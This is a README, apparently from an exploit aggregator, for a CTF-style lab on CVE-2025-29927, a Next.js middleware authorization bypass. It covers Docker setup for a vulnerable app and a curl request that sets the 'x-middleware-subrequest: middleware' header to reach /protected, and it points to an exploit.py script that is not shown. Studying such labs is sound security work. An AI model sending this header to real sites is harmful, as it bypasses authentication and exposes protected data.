Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (76 reviews)
2025-04-16 | CVSS 9.1
## https://sploitus.com/exploit?id=A67DEE91-2863-597C-9938-298ED26DC6A8
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.

---

## Vulnerability Summary

- **CVE**: CVE-2025-29927  
- **Type**: Authorization Bypass  
- **Component**: Next.js Middleware  
- **Impact**: Unauthorized access to protected routes  
- **PoC Target Route**: `/protected`  
- **Expected Behavior**: Unauthorized users are redirected to `/`  
- **Vulnerable Behavior**: Using a crafted request allows bypassing the redirect and accessing the protected content directly

---

## PoC Setup

### 1. Clone the Repository

```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```
---
### 2. Build and Run the Vulnerable App

```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```

This will start the vulnerable Next.js app on **http://IP:3000**

---

## Exploitation

### 1. Without Exploit

Try accessing:

```bash
curl -i http://IP:3000/protected
```

You will be redirected to `/`.

```bash
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```

### 2. With Exploit

Use the provided `exploit.py` to bypass the middleware and access the protected route:

```bash
python3 exploit.py -url http://IP:3000
```

If successful, you will retrieve the flag from `/protected`.

---

##  Files

- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file

---

## Disclaimer

This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.

---

## 🏁 Flag

Find the flag by exploiting the vulnerability and accessing:

```
http://IP:3000/protected
```

Good luck! 🏴‍☠️